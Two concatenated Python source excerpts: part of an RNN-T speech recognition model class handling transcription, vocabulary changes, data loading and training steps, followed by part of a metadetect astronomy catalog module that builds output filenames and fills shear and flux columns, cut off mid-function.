config = {'paths2audio_files': paths2audio_files, 'batch_size': batch_size, 'temp_dir': tmpdir}
temporary_datalayer = self._setup_transcribe_dataloader(config)
for test_batch in tqdm(temporary_datalayer, desc="Transcribing"):
encoded, encoded_len = self.forward(
input_signal=test_batch[0].to(device), input_signal_length=test_batch[1].to(device)
)
best_hyp, all_hyp = self.decoding.rnnt_decoder_predictions_tensor(
encoded,
encoded_len,
return_hypotheses=return_hypotheses,
partial_hypotheses=partial_hypothesis,
)
hypotheses += best_hyp
if all_hyp is not None:
all_hypotheses += all_hyp
else:
all_hypotheses += best_hyp
del encoded
del test_batch
finally:
# set mode back to its original value
self.train(mode=mode)
self.preprocessor.featurizer.dither = dither_value
self.preprocessor.featurizer.pad_to = pad_to_value
logging.set_verbosity(logging_level)
if mode is True:
self.encoder.unfreeze()
self.decoder.unfreeze()
self.joint.unfreeze()
return hypotheses, all_hypotheses
def change_vocabulary(self, new_vocabulary: List[str], decoding_cfg: Optional[DictConfig] = None):
"""
Changes vocabulary used during RNNT decoding process. Use this method when fine-tuning a pre-trained model.
This method changes only decoder and leaves encoder and pre-processing modules unchanged. For example, you would
use it if you want to use pretrained encoder when fine-tuning on data in another language, or when you'd need
model to learn capitalization, punctuation and/or special characters.
Args:
new_vocabulary: list with new vocabulary. Must contain at least 2 elements. Typically, \
this is target alphabet.
decoding_cfg: A config for the decoder, which is optional. If the decoding type
needs to be changed (from say Greedy to Beam decoding etc), the config can be passed here.
Returns: None
"""
if self.joint.vocabulary == new_vocabulary:
logging.warning(f"Old {self.joint.vocabulary} and new {new_vocabulary} match. Not changing anything.")
else:
if new_vocabulary is None or len(new_vocabulary) == 0:
raise ValueError(f'New vocabulary must be non-empty list of chars. But I got: {new_vocabulary}')
joint_config = self.joint.to_config_dict()
new_joint_config = copy.deepcopy(joint_config)
new_joint_config['vocabulary'] = new_vocabulary
new_joint_config['num_classes'] = len(new_vocabulary)
del self.joint
self.joint = EncDecRNNTModel.from_config_dict(new_joint_config)
decoder_config = self.decoder.to_config_dict()
new_decoder_config = copy.deepcopy(decoder_config)
new_decoder_config.vocab_size = len(new_vocabulary)
del self.decoder
self.decoder = EncDecRNNTModel.from_config_dict(new_decoder_config)
del self.loss
loss_name, loss_kwargs = self.extract_rnnt_loss_cfg(self.cfg.get('loss', None))
self.loss = RNNTLoss(
num_classes=self.joint.num_classes_with_blank - 1, loss_name=loss_name, loss_kwargs=loss_kwargs
)
if decoding_cfg is None:
# Assume same decoding config as before
decoding_cfg = self.cfg.decoding
self.decoding = RNNTDecoding(
decoding_cfg=decoding_cfg, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=self.wer.batch_dim_index,
use_cer=self.wer.use_cer,
log_prediction=self.wer.log_prediction,
dist_sync_on_step=True,
)
# Setup fused Joint step
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
# Update config
with open_dict(self.cfg.joint):
self.cfg.joint = new_joint_config
with open_dict(self.cfg.decoder):
self.cfg.decoder = new_decoder_config
with open_dict(self.cfg.decoding):
self.cfg.decoding = decoding_cfg
ds_keys = ['train_ds', 'validation_ds', 'test_ds']
for key in ds_keys:
if key in self.cfg:
with open_dict(self.cfg[key]):
self.cfg[key]['labels'] = OmegaConf.create(new_vocabulary)
logging.info(f"Changed decoder to output to {self.joint.vocabulary} vocabulary.")
def change_decoding_strategy(self, decoding_cfg: DictConfig):
"""
Changes decoding strategy used during RNNT decoding process.
Args:
decoding_cfg: A config for the decoder, which is optional. If the decoding type
needs to be changed (from say Greedy to Beam decoding etc), the config can be passed here.
"""
if decoding_cfg is None:
# Assume same decoding config as before
logging.info("No `decoding_cfg` passed when changing decoding strategy, using internal config")
decoding_cfg = self.cfg.decoding
self.decoding = RNNTDecoding(
decoding_cfg=decoding_cfg, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=self.wer.batch_dim_index,
use_cer=self.wer.use_cer,
log_prediction=self.wer.log_prediction,
dist_sync_on_step=True,
)
# Setup fused Joint step
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
# Update config
with open_dict(self.cfg.decoding):
self.cfg.decoding = decoding_cfg
logging.info(f"Changed decoding strategy to \n{OmegaConf.to_yaml(self.cfg.decoding)}")
def _setup_dataloader_from_config(self, config: Optional[Dict]):
if 'augmentor' in config:
augmentor = process_augmentations(config['augmentor'])
else:
augmentor = None
# Automatically inject args from model config to dataloader config
audio_to_text_dataset.inject_dataloader_value_from_model_config(self.cfg, config, key='sample_rate')
audio_to_text_dataset.inject_dataloader_value_from_model_config(self.cfg, config, key='labels')
shuffle = config['shuffle']
device = 'gpu' if torch.cuda.is_available() else 'cpu'
if config.get('use_dali', False):
device_id = self.local_rank if device == 'gpu' else None
dataset = audio_to_text_dataset.get_dali_char_dataset(
config=config,
shuffle=shuffle,
device_id=device_id,
global_rank=self.global_rank,
world_size=self.world_size,
preprocessor_cfg=self._cfg.preprocessor,
)
return dataset
# Instantiate tarred dataset loader or normal dataset loader
if config.get('is_tarred', False):
if ('tarred_audio_filepaths' in config and config['tarred_audio_filepaths'] is None) or (
'manifest_filepath' in config and config['manifest_filepath'] is None
):
logging.warning(
"Could not load dataset as `manifest_filepath` was None or "
f"`tarred_audio_filepaths` is None. Provided config : {config}"
)
return None
shuffle_n = config.get('shuffle_n', 4 * config['batch_size']) if shuffle else 0
dataset = audio_to_text_dataset.get_tarred_dataset(
config=config,
shuffle_n=shuffle_n,
global_rank=self.global_rank,
world_size=self.world_size,
augmentor=augmentor,
)
shuffle = False
else:
if 'manifest_filepath' in config and config['manifest_filepath'] is None:
logging.warning(f"Could not load dataset as `manifest_filepath` was None. Provided config : {config}")
return None
dataset = audio_to_text_dataset.get_char_dataset(config=config, augmentor=augmentor)
if type(dataset) is ChainDataset:
collate_fn = dataset.datasets[0].collate_fn
else:
collate_fn = dataset.collate_fn
return torch.utils.data.DataLoader(
dataset=dataset,
batch_size=config['batch_size'],
collate_fn=collate_fn,
drop_last=config.get('drop_last', False),
shuffle=shuffle,
num_workers=config.get('num_workers', 0),
pin_memory=config.get('pin_memory', False),
)
def setup_training_data(self, train_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the training data loader via a Dict-like object.
Args:
train_data_config: A config that contains the information regarding construction
of an ASR Training dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in train_data_config:
train_data_config['shuffle'] = True
# preserve config
self._update_dataset_config(dataset_name='train', config=train_data_config)
self._train_dl = self._setup_dataloader_from_config(config=train_data_config)
# Need to set this because if using an IterableDataset, the length of the dataloader is the total number
# of samples rather than the number of batches, and this messes up the tqdm progress bar.
# So we set the number of steps manually (to the correct number) to fix this.
if 'is_tarred' in train_data_config and train_data_config['is_tarred']:
# We also need to check if limit_train_batches is already set.
# If it's an int, we assume that the user has set it to something sane, i.e. <= # training batches,
# and don't change it. Otherwise, adjust batches accordingly if it's a float (including 1.0).
if isinstance(self._trainer.limit_train_batches, float):
self._trainer.limit_train_batches = int(
self._trainer.limit_train_batches
* ceil((len(self._train_dl.dataset) / self.world_size) / train_data_config['batch_size'])
)
def setup_validation_data(self, val_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the validation data loader via a Dict-like object.
Args:
val_data_config: A config that contains the information regarding construction
of an ASR Training dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in val_data_config:
val_data_config['shuffle'] = False
# preserve config
self._update_dataset_config(dataset_name='validation', config=val_data_config)
self._validation_dl = self._setup_dataloader_from_config(config=val_data_config)
def setup_test_data(self, test_data_config: Optional[Union[DictConfig, Dict]]):
"""
Sets up the test data loader via a Dict-like object.
Args:
test_data_config: A config that contains the information regarding construction
of an ASR Training dataset.
Supported Datasets:
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.AudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToCharDataset`
- :class:`~nemo.collections.asr.data.audio_to_text.TarredAudioToBPEDataset`
- :class:`~nemo.collections.asr.data.audio_to_text_dali.AudioToCharDALIDataset`
"""
if 'shuffle' not in test_data_config:
test_data_config['shuffle'] = False
# preserve config
self._update_dataset_config(dataset_name='test', config=test_data_config)
self._test_dl = self._setup_dataloader_from_config(config=test_data_config)
@property
def input_types(self) -> Optional[Dict[str, NeuralType]]:
if hasattr(self.preprocessor, '_sample_rate'):
input_signal_eltype = AudioSignal(freq=self.preprocessor._sample_rate)
else:
input_signal_eltype = AudioSignal()
return {
"input_signal": NeuralType(('B', 'T'), input_signal_eltype, optional=True),
"input_signal_length": NeuralType(tuple('B'), LengthsType(), optional=True),
"processed_signal": NeuralType(('B', 'D', 'T'), SpectrogramType(), optional=True),
"processed_signal_length": NeuralType(tuple('B'), LengthsType(), optional=True),
}
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
return {
"outputs": NeuralType(('B', 'D', 'T'), AcousticEncodedRepresentation()),
"encoded_lengths": NeuralType(tuple('B'), LengthsType()),
}
@typecheck()
def forward(
self, input_signal=None, input_signal_length=None, processed_signal=None, processed_signal_length=None
):
"""
Forward pass of the model. Note that for RNNT Models, the forward pass of the model is a 3 step process,
and this method only performs the first step - forward of the acoustic model.
Please refer to the `training_step` in order to see the full `forward` step for training - which
performs the forward of the acoustic model, the prediction network and then the joint network.
Finally, it computes the loss and possibly compute the detokenized text via the `decoding` step.
Please refer to the `validation_step` in order to see the full `forward` step for inference - which
performs the forward of the acoustic model, the prediction network and then the joint network.
Finally, it computes the decoded tokens via the `decoding` step and possibly compute the batch metrics.
Args:
input_signal: Tensor that represents a batch of raw audio signals,
of shape [B, T]. T here represents timesteps, with 1 second of audio represented as
`self.sample_rate` number of floating point values.
input_signal_length: Vector of length B, that contains the individual lengths of the audio
sequences.
processed_signal: Tensor that represents a batch of processed audio signals,
of shape (B, D, T) that has undergone processing via some DALI preprocessor.
processed_signal_length: Vector of length B, that contains the individual lengths of the
processed audio sequences.
Returns:
A tuple of 2 elements -
1) The log probabilities tensor of shape [B, T, D].
2) The lengths of the acoustic sequence after propagation through the encoder, of shape [B].
"""
has_input_signal = input_signal is not None and input_signal_length is not None
has_processed_signal = processed_signal is not None and processed_signal_length is not None
if (has_input_signal ^ has_processed_signal) is False:
raise ValueError(
f"{self} Arguments ``input_signal`` and ``input_signal_length`` are mutually exclusive "
" with ``processed_signal`` and ``processed_signal_len`` arguments."
)
if not has_processed_signal:
processed_signal, processed_signal_length = self.preprocessor(
input_signal=input_signal, length=input_signal_length,
)
# Spec augment is not applied during evaluation/testing
if self.spec_augmentation is not None and self.training:
processed_signal = self.spec_augmentation(input_spec=processed_signal, length=processed_signal_length)
encoded, encoded_len = self.encoder(audio_signal=processed_signal, length=processed_signal_length)
return encoded, encoded_len
# PTL-specific methods
def training_step(self, batch, batch_nb):
signal, signal_len, transcript, transcript_len = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
# During training, loss must be computed, so decoder forward is necessary
decoder, target_length, states = self.decoder(targets=transcript, target_length=transcript_len)
if hasattr(self, '_trainer') and self._trainer is not None:
log_every_n_steps = self._trainer.log_every_n_steps
sample_id = self._trainer.global_step
else:
log_every_n_steps = 1
sample_id = batch_nb
# If experimental fused Joint-Loss-WER is not used
if not self.joint.fuse_loss_wer:
# Compute full joint and loss
joint = self.joint(encoder_outputs=encoded, decoder_outputs=decoder)
loss_value = self.loss(
log_probs=joint, targets=transcript, input_lengths=encoded_len, target_lengths=target_length
)
tensorboard_logs = {'train_loss': loss_value, 'learning_rate': self._optimizer.param_groups[0]['lr']}
if (sample_id + 1) % log_every_n_steps == 0:
self.wer.update(encoded, encoded_len, transcript, transcript_len)
_, scores, words = self.wer.compute()
self.wer.reset()
tensorboard_logs.update({'training_batch_wer': scores.float() / words})
else:
# If experimental fused Joint-Loss-WER is used
if (sample_id + 1) % log_every_n_steps == 0:
compute_wer = True
else:
compute_wer = False
# Fused joint step
loss_value, wer, _, _ = self.joint(
encoder_outputs=encoded,
decoder_outputs=decoder,
encoder_lengths=encoded_len,
transcripts=transcript,
transcript_lengths=transcript_len,
compute_wer=compute_wer,
)
tensorboard_logs = {'train_loss': loss_value, 'learning_rate': self._optimizer.param_groups[0]['lr']}
if compute_wer:
tensorboard_logs.update({'training_batch_wer': wer})
# Log items
self.log_dict(tensorboard_logs)
# Preserve batch acoustic model T and language model U parameters if normalizing
if self._optim_normalize_joint_txu:
self._optim_normalize_txu = [encoded_len.max(), transcript_len.max()]
return {'loss': loss_value}
def predict_step(self, batch, batch_idx, dataloader_idx=0):
signal, signal_len, transcript, transcript_len, sample_id = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
best_hyp_text, all_hyp_text = self.decoding.rnnt_decoder_predictions_tensor(
encoder_output=encoded, encoded_lengths=encoded_len, return_hypotheses=False
)
sample_id = sample_id.cpu().detach().numpy()
return list(zip(sample_id, best_hyp_text))
def validation_step(self, batch, batch_idx, dataloader_idx=0):
signal, signal_len, transcript, transcript_len = batch
# forward() only performs encoder forward
if isinstance(batch, DALIOutputs) and batch.has_processed_signal:
encoded, encoded_len = self.forward(processed_signal=signal, processed_signal_length=signal_len)
else:
encoded, encoded_len = self.forward(input_signal=signal, input_signal_length=signal_len)
del signal
tensorboard_logs = {}
# If experimental fused Joint-Loss-WER is not used
if not self.joint.fuse_loss_wer:
if self.compute_eval_loss:
decoder, target_length, states = self.decoder(targets=transcript, target_length=transcript_len)
joint = self.joint(encoder_outputs=encoded, decoder_outputs=decoder)
loss_value = self.loss(
log_probs=joint, targets=transcript, input_lengths=encoded_len, target_lengths=target_length
)
tensorboard_logs['val_loss'] = loss_value
self.wer.update(encoded, encoded_len, transcript, transcript_len)
wer, wer_num, wer_denom = self.wer.compute()
self.wer.reset()
tensorboard_logs['val_wer_num'] = wer_num
tensorboard_logs['val_wer_denom'] = wer_denom
tensorboard_logs['val_wer'] = wer
else:
# If experimental fused Joint-Loss-WER is used
compute_wer = True
if self.compute_eval_loss:
decoded, target_len, states = self.decoder(targets=transcript, target_length=transcript_len)
else:
decoded = None
target_len = transcript_len
# Fused joint step
loss_value, wer, wer_num, wer_denom = self.joint(
encoder_outputs=encoded,
decoder_outputs=decoded,
encoder_lengths=encoded_len,
transcripts=transcript,
transcript_lengths=target_len,
compute_wer=compute_wer,
)
if loss_value is not None:
tensorboard_logs['val_loss'] = loss_value
tensorboard_logs['val_wer_num'] = wer_num
tensorboard_logs['val_wer_denom'] = wer_denom
tensorboard_logs['val_wer'] = wer
return tensorboard_logs
def test_step(self, batch, batch_idx, dataloader_idx=0):
logs = self.validation_step(batch, batch_idx, dataloader_idx=dataloader_idx)
test_logs = {
'test_wer_num': logs['val_wer_num'],
'test_wer_denom': logs['val_wer_denom'],
# 'test_wer': logs['val_wer'],
}
if 'val_loss' in logs:
test_logs['test_loss'] = logs['val_loss']
return test_logs
def multi_validation_epoch_end(self, outputs, dataloader_idx: int = 0):
if self.compute_eval_loss:
val_loss_mean = torch.stack([x['val_loss'] for x in outputs]).mean()
val_loss_log = {'val_loss': val_loss_mean}
else:
val_loss_log = {}
wer_num = torch.stack([x['val_wer_num'] for x in outputs]).sum()
wer_denom = torch.stack([x['val_wer_denom'] for x in outputs]).sum()
tensorboard_logs = {**val_loss_log, 'val_wer': wer_num.float() / wer_denom}
return {**val_loss_log, 'log': tensorboard_logs}
def multi_test_epoch_end(self, outputs, dataloader_idx: int = 0):
if self.compute_eval_loss:
test_loss_mean = torch.stack([x['test_loss'] for x in outputs]).mean()
test_loss_log = {'test_loss': test_loss_mean}
else:
test_loss_log = {}
wer_num = torch.stack([x['test_wer_num'] for x in outputs]).sum()
wer_denom = torch.stack([x['test_wer_denom'] for x in outputs]).sum()
tensorboard_logs = {**test_loss_log, 'test_wer': wer_num.float() / wer_denom}
return {**test_loss_log, 'log': tensorboard_logs}
def _setup_transcribe_dataloader(self, config: Dict) -> 'torch.utils.data.DataLoader':
"""
Setup function for a temporary data loader which wraps the provided audio file.
Args:
config: A python dictionary which contains the following keys:
paths2audio_files: (a list) of paths to audio files. The files should be relatively short fragments. \
Recommended length per file is between 5 and 25 seconds.
batch_size: (int) batch size to use during inference. \
Bigger will result in better throughput performance but would use more memory.
temp_dir: (str) A temporary directory where the audio manifest is temporarily
stored.
Returns:
A pytorch DataLoader for the given audio file(s).
"""
batch_size = min(config['batch_size'], len(config['paths2audio_files']))
dl_config = {
'manifest_filepath': os.path.join(config['temp_dir'], 'manifest.json'),
'sample_rate': self.preprocessor._sample_rate,
'labels': self.joint.vocabulary,
'batch_size': batch_size,
'trim_silence': False,
'shuffle': False,
'num_workers': min(batch_size, os.cpu_count() - 1),
'pin_memory': True,
}
temporary_datalayer = self._setup_dataloader_from_config(config=DictConfig(dl_config))
return temporary_datalayer
def on_after_backward(self):
super().on_after_backward()
if self._optim_variational_noise_std > 0 and self.global_step >= self._optim_variational_noise_start:
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
noise = torch.normal(
mean=0.0,
std=self._optim_variational_noise_std,
size=param.size(),
device=param.device,
dtype=param.dtype,
)
param.grad.data.add_(noise)
if self._optim_normalize_joint_txu:
T, U = self._optim_normalize_txu
if T is not None and U is not None:
for param_name, param in self.encoder.named_parameters():
if param.grad is not None:
param.grad.data.div_(U)
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
param.grad.data.div_(T)
if self._optim_normalize_encoder_norm:
for param_name, param in self.encoder.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
if self._optim_normalize_decoder_norm:
for param_name, param in self.decoder.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
if self._optim_normalize_joint_norm:
for param_name, param in self.joint.named_parameters():
if param.grad is not None:
norm = param.grad.norm()
param.grad.data.div_(norm)
|
the-stack_106_30612 | import os
import json
import time
import datetime
import logging
import subprocess
import yaml
import joblib
import numpy as np
import esutil as eu
import fitsio
import ngmix
import healpy as hp
from esutil.pbar import PBar
from metadetect.metadetect import do_metadetect
from metadetect.masking import apply_apodization_corrections
from pizza_cutter.files import expandpath
from pizza_cutter.des_pizza_cutter import BMASK_SLICE_APODIZED
from .gaia_stars import (
load_gaia_stars, mask_gaia_stars, BMASK_GAIA_STAR, BMASK_EXPAND_GAIA_STAR,
)
from .masks import (
make_mask, get_slice_bounds, in_unique_coadd_tile_region,
MASK_TILEDUPE, MASK_SLICEDUPE, MASK_GAIA_STAR,
MASK_NOSLICE, MASK_MISSING_BAND, MASK_MISSING_NOSHEAR_DET,
MASK_MISSING_BAND_PREPROC, MASK_MISSING_MDET_RES,
MASK_MDET_FAILED,
)
from pizza_cutter.des_pizza_cutter import get_coaddtile_geom
LOGGER = logging.getLogger(__name__)
def split_range(meds_range):
"""
Parameters
----------
meds_range: str
e.g. '3:7' is like a python slice
Returns
-------
start, end_plus_one, num
Start index, end+1 from the slice, and number to process
"""
start, end_plus_one = meds_range.split(':')
start = int(start)
end_plus_one = int(end_plus_one)
num = end_plus_one - start # last element is the end of the range + 1
return start, end_plus_one, num
def make_output_filename(directory, config_fname, meds_fname, part, meds_range):
"""
make the output name
Parameters
----------
directory: str
The directory for the outputs.
config_fname: str
The config file name.
meds_fname: str
Example meds file name
part: int
The part of the file processed
meds_range: str
The slice to process, as as string, e.g. '3:7'
Returns
-------
file basename
"""
mdetrun = os.path.basename(config_fname)
if mdetrun.endswith(".yaml") or mdetrun.endswith(".yml"):
mdetrun = mdetrun.rsplit(".", 1)[0]
fname = os.path.basename(meds_fname)
fname = fname.replace('.fz', '').replace('.fits', '')
items = fname.split('_')
# keep real DES data names short. By convention, the first part
# is the tilename
parts = [items[0], mdetrun, "mdetcat"]
if part is None and meds_range is None:
part = 0
if part is not None:
tail = 'part%04d.fits.fz' % part
else:
start, end_plus_one, num = split_range(meds_range)
end = end_plus_one - 1
tail = 'range%04d-%04d.fits.fz' % (start, end)
parts.append(tail)
fname = '_'.join(parts)
fname = os.path.join(directory, fname)
fname = expandpath(fname)
return fname
def _make_output_dtype(*, nbands, filename_len, tilename_len, band_names):
new_dt = [
('slice_id', 'i8'),
('mdet_step', 'U7'),
('ra', 'f8'),
('dec', 'f8'),
('ra_noshear', 'f8'),
('dec_noshear', 'f8'),
('y_noshear', 'f8'),
('x_noshear', 'f8'),
('y', 'f8'),
('x', 'f8'),
('slice_y', 'f8'),
('slice_x', 'f8'),
('slice_y_noshear', 'f8'),
('slice_x_noshear', 'f8'),
('hpix_16384', 'i8'),
('hpix_16384_noshear', 'i8'),
('filename', 'U%d' % filename_len),
('tilename', 'U%d' % tilename_len),
# columns from mdet
# we flatten shears and matrices
("flags", 'i4'),
('psf_flags', 'i4'),
('psf_g_1', 'f8'),
('psf_g_2', 'f8'),
('psf_T', 'f8'),
("mdet_flags", 'i4'),
("mdet_s2n", "f8"),
("mdet_g_1", "f8"),
("mdet_g_2", "f8"),
("mdet_g_cov_1_1", "f8"),
("mdet_g_cov_1_2", "f8"),
("mdet_g_cov_2_2", "f8"),
("mdet_T", "f8"),
("mdet_T_err", "f8"),
("mdet_T_ratio", "f8"),
('ormask', 'i4'),
('mfrac', 'f4'),
('bmask', 'i4'),
('mask_flags', 'i4'),
('ormask_noshear', 'i4'),
('mfrac_noshear', 'f4'),
('bmask_noshear', 'i4'),
('mask_flags_noshear', 'i4'),
# this is the original PSF
('psfrec_flags', 'i4'),
('psfrec_g_1', 'f8'),
('psfrec_g_2', 'f8'),
('psfrec_T', 'f8'),
]
new_dt += [
("mdet_flux_flags", 'i4'),
]
if band_names is not None:
new_dt += [
("mdet_%s_flux" % b, "f8")
for b in band_names
]
new_dt += [
("mdet_%s_flux_err" % b, "f8")
for b in band_names
]
new_dt += [
("nepoch_%s" % b, "i4")
for b in band_names
]
new_dt += [
("nepoch_eff_%s" % b, "i4")
for b in band_names
]
else:
if nbands > 1:
new_dt += [
("mdet_flux", "f8", nbands),
("mdet_flux_err", "f8", nbands),
("nepoch", "i4", nbands),
("nepoch_eff", "i4", nbands),
]
else:
new_dt += [
("mdet_flux", "f8"),
("mdet_flux_err", "f8"),
("nepoch", "i4"),
("nepoch_eff", "i4"),
]
return new_dt
def _redorder_band_fluxes(model, data, bandinds):
if len(bandinds) > 1:
mpre = model + "_"
for col in ["band_flux", "band_flux_err"]:
old_fluxes = data[mpre+col].copy()
for iold, inew in enumerate(bandinds):
data[mpre+col][:, inew] = old_fluxes[:, iold]
return data
def _make_output_array(
*,
data, slice_id, mdet_step,
orig_start_row, orig_start_col, position_offset, wcs, buffer_size,
central_size, coadd_dims, model, info, output_file, band_names, band_inds,
nepoch_per_band, nepoch_eff_per_band,
):
"""
Add columns to the output data array. These include the slice id, metacal
step (e.g. '1p'), ra, dec in the sheared coordinates as well as unsheared
coordinates
Parameters
----------
data: array with fields
The data, to be augmented
slice_id: int
The slice id
mdet_step: str
e.g. 'noshear', '1p', '1m', '2p', '2m'
orig_start_row: int
Start row of origin of slice
orig_start_col: int
Start col of origin of slice
position_offset: int
Often 1 for wcs
wcs: world coordinate system object
wcs for converting image positions to sky positions
buffer_size: int
The size of the buffer region to cut for each slice.
central_size: int
The size of the central region.
coadd_dims: tuple of ints
The dimension of the full image that the slices tile.
model: str
The model used for metadetect. This is used to rename columns starting
with '{model}_' to 'mdet_'.
info : dict
Dict of tile geom information for getting detections in the tile boundaries.
output_file : str
The output filename.
band_names : list of str
If given, the names of the bands as single strings to use in generating the
output data.
band_inds : list of int
The band fluxes are reordered according to these indices.
nepoch_per_band : list of int
The number of coadded epochs per band.
nepoch_eff_per_band : list of int
The effective number of coadded epochs per band.
Returns
-------
array with new fields
"""
mpre = model + '_'
# get # of bands
name = mpre + "band_flux"
if len(data[name].shape) == 1:
nbands = 1
else:
nbands = data[name].shape[1]
if band_inds is not None:
data = _redorder_band_fluxes(model, data, band_inds)
assert len(band_inds) == nbands, (
"The # of band inds %s doesn't match the number of bands %d." % (
band_inds,
nbands,
)
)
if band_names is not None:
assert len(band_names) == nbands, (
"The # of band names %s doesn't match the number of bands %d." % (
band_inds,
nbands,
)
)
filename = os.path.basename(output_file)
if filename.endswith(".fz"):
filename = filename[:-len(".fz")]
tilename = filename.split('_')[0]
new_dt = _make_output_dtype(
nbands=nbands,
filename_len=len(filename),
tilename_len=len(tilename),
band_names=band_names,
)
arr = np.zeros(data.shape, dtype=new_dt)
for name in arr.dtype.names:
if arr[name].dtype.kind == "f":
arr[name] = np.nan
# fill simple columns
for col in [
"flags",
"psf_flags",
"psf_T",
"ormask",
"mfrac",
"bmask",
"ormask_noshear",
"mfrac_noshear",
"bmask_noshear",
"psfrec_flags",
"psfrec_T",
]:
if col in data.dtype.names:
arr[col] = data[col]
# now fill the model dependent ones
for col in [
"mdet_flags",
"mdet_s2n",
"mdet_T",
"mdet_T_err",
"mdet_T_ratio",
]:
data_col = mpre + col[len("mdet_"):]
if data_col in data.dtype.names:
arr[col] = data[data_col]
# do the shears
if "psf_g" in data.dtype.names:
arr["psf_g_1"] = data["psf_g"][:, 0]
arr["psf_g_2"] = data["psf_g"][:, 1]
if "psfrec_g" in data.dtype.names:
arr["psfrec_g_1"] = data["psfrec_g"][:, 0]
arr["psfrec_g_2"] = data["psfrec_g"][:, 1]
if mpre + "g" in data.dtype.names:
arr["mdet_g_1"] = data[mpre + "g"][:, 0]
arr["mdet_g_2"] = data[mpre + "g"][:, 1]
if mpre + "g_cov" in data.dtype.names:
arr["mdet_g_cov_1_1"] = data[mpre + "g_cov"][:, 0, 0]
arr["mdet_g_cov_1_2"] = data[mpre + "g_cov"][:, 0, 1]
arr["mdet_g_cov_2_2"] = data[mpre + "g_cov"][:, 1, 1]
# fluxes
if mpre + "band_flux_flags" in data.dtype.names:
arr["mdet_flux_flags"] = data[mpre + "band_flux_flags"]
if (
mpre + "band_flux" in data.dtype.names
and mpre + "band_flux_err" in data.dtype.names
):
if band_names is not None:
if nbands == 1:
arr["mdet_%s_flux" % band_names[0]] = data[mpre + "band_flux"][:]
arr["mdet_%s_flux_err" % band_names[0]] \
= data[mpre + "band_flux_err"][:]
else:
for i, b in enumerate(band_names):
arr["mdet_%s_flux" % b] = data[mpre + "band_flux"][:, i]
arr["mdet_%s_flux_err" % b] = data[mpre + "band_flux_err"][:, i]
else:
arr["mdet_flux"] = data[mpre + "band_flux"]
arr["mdet_flux_err"] = data[mpre + "band_flux_err"]
assert len(nepoch_per_band) == nbands, (
"The length of the band nepochs list %s doesn't match the "
"number of bands %d." % (
nepoch_per_band,
nbands,
)
)
assert len(nepoch_eff_per_band) == nbands, (
"The length of the effective band nepochs list %s doesn't match the "
"number of bands %d." % (
nepoch_eff_per_band,
nbands,
)
)
if band_names is not None:
for b, ne in zip(band_names, nepoch_per_band):
arr["nepoch_%s" % b] = ne
for b, ne in zip(band_names, nepoch_eff_per_band):
arr["nepoch_eff_%s" % b] = ne
else:
arr["nepoch"][:] = np.array(nepoch_per_band, dtype="i4")
arr["nepoch_eff"][:] = np.array(nepoch_eff_per_band, dtype="i4")
arr['slice_id'] = slice_id
arr['mdet_step'] = mdet_step
arr['filename'] = filename
arr['tilename'] = tilename
# deal with positions
arr['slice_y_noshear'] = data['sx_row_noshear']
arr['slice_x_noshear'] = data['sx_col_noshear']
arr['slice_y'] = data['sx_row']
arr['slice_x'] = data['sx_col']
# these are in global coadd coords
arr['y'] = orig_start_row + data['sx_row']
arr['x'] = orig_start_col + data['sx_col']
arr['y_noshear'] = orig_start_row + data['sx_row_noshear']
arr['x_noshear'] = orig_start_col + data['sx_col_noshear']
arr['ra'], arr['dec'] = _get_radec(
row=arr['slice_y'],
col=arr['slice_x'],
orig_start_row=orig_start_row,
orig_start_col=orig_start_col,
position_offset=position_offset,
wcs=wcs,
)
arr['hpix_16384'] = hp.ang2pix(
16384, arr['ra'], arr['dec'], nest=True, lonlat=True
)
arr['ra_noshear'], arr['dec_noshear'] = _get_radec(
row=arr['slice_y_noshear'],
col=arr['slice_x_noshear'],
orig_start_row=orig_start_row,
orig_start_col=orig_start_col,
position_offset=position_offset,
wcs=wcs,
)
arr['hpix_16384_noshear'] = hp.ang2pix(
16384, arr['ra_noshear'], arr['dec_noshear'], nest=True, lonlat=True
)
slice_bnds = get_slice_bounds(
orig_start_col=orig_start_col,
orig_start_row=orig_start_row,
central_size=central_size,
buffer_size=buffer_size,
coadd_dims=coadd_dims
)
for tail in ["", "_noshear"]:
